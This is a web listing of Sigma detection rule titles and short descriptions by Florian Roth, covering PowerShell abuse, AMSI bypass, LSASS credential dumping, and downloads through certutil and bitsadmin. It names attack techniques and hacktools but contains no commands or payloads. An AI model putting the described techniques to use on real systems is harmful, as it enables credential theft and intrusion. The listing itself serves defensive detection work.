Sigma Rules
638 rules found for "Florian Roth (Nextron Systems)"
Suspicious PowerShell Invocations - Generic - PowerShell Module
Detects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific - PowerShell Module
Detects suspicious PowerShell invocation command parameters
AMSI Bypass Pattern Assembly GetType
Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Certificate Exported Via PowerShell - ScriptBlock
Detects calls to cmdlets inside of PowerShell scripts that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines.
HackTool - Rubeus Execution - ScriptBlock
Detects the execution of the hacktool Rubeus using specific command line flags
Malicious PowerShell Commandlets - ScriptBlock
Detects Commandlet names from well-known PowerShell exploitation frameworks
Malicious PowerShell Keywords
Detects keywords from well-known PowerShell exploitation frameworks
PowerShell Credential Prompt
Detects PowerShell calling a credential prompt
PowerShell PSAttack
Detects the use of PSAttack PowerShell hack tool
PowerShell ShellCode
Detects Base64 encoded Shellcode
Suspicious PowerShell Download - Powershell Script
Detects suspicious PowerShell download command
PowerShell Get-Process LSASS in ScriptBlock
Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity
Suspicious PowerShell Invocations - Generic
Detects suspicious PowerShell invocation command parameters
Suspicious PowerShell Invocations - Specific
Detects suspicious PowerShell invocation command parameters
Potential Suspicious PowerShell Keywords
Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework
HackTool - SysmonEnte Execution
Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon
LSASS Memory Access by Tool With Dump Keyword In Name
Detects LSASS process access requests from a source process with the "dump" keyword in its image name.
Potentially Suspicious GrantedAccess Flags On LSASS
Detects process access requests to LSASS process with potentially suspicious access flags
Credential Dumping Attempt Via WerFault
Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.
LSASS Access From Potentially White-Listed Processes
Detects a possible process memory dump that uses a white-listed filename like TrolleyExpress.exe as a way to dump the LSASS process memory without Microsoft Defender interference
Potential DLL Injection Via AccCheckConsole
Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.
Suspicious Download From Direct IP Via Bitsadmin
Detects usage of bitsadmin downloading a file using an URL that contains an IP
Suspicious Download From File-Sharing Website Via Bitsadmin
Detects usage of bitsadmin downloading a file from a suspicious domain
File With Suspicious Extension Downloaded Via Bitsadmin
Detects usage of bitsadmin downloading a file with a suspicious extension
File Download Via Bitsadmin To A Suspicious Target Folder
Detects usage of bitsadmin downloading a file to a suspicious target folder
File Download with Headless Browser
Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
File Download From Browser Process Via Inline URL
Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
Suspicious Calculator Usage
Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
File Decoded From Base64/Hex Via Certutil.EXE
Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
Suspicious Download Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files.
File Encoded To Base64 Via Certutil.EXE
Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
Certificate Exported Via Certutil.EXE
Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
Suspicious CodePage Switch Via CHCP
Detects a code page switch in command line or batch scripts to a rare language
Process Access via TrolleyExpress Exclusion
Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Command Line Execution with Suspicious URL and AppData Strings
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Cmd.EXE Missing Space Characters Execution Anomaly
Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer).
NtdllPipe Like Activity Execution
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
Sticky Key Like Backdoor Execution
Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE
Detects usage of cmdkey to look for cached credentials on the system
CreateDump Process Dump
Detects uses of the createdump.exe LOLOBIN utility to dump process memory
Dynamic .NET Compilation Via Csc.EXE
Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Csc.EXE Execution Form Potentially Suspicious Parent
Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Suspicious Curl.EXE Download
Detects a suspicious curl process start on Windows and outputs the requested document to a local file
ManageEngine Endpoint Central Dctask64.EXE Potential Abuse
Detects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Suspicious Desktopimgdownldr Command
Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
Arbitrary MSI Download Via Devinit.EXE
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXE
Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
Suspicious Kernel Dump Using Dtrace
Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1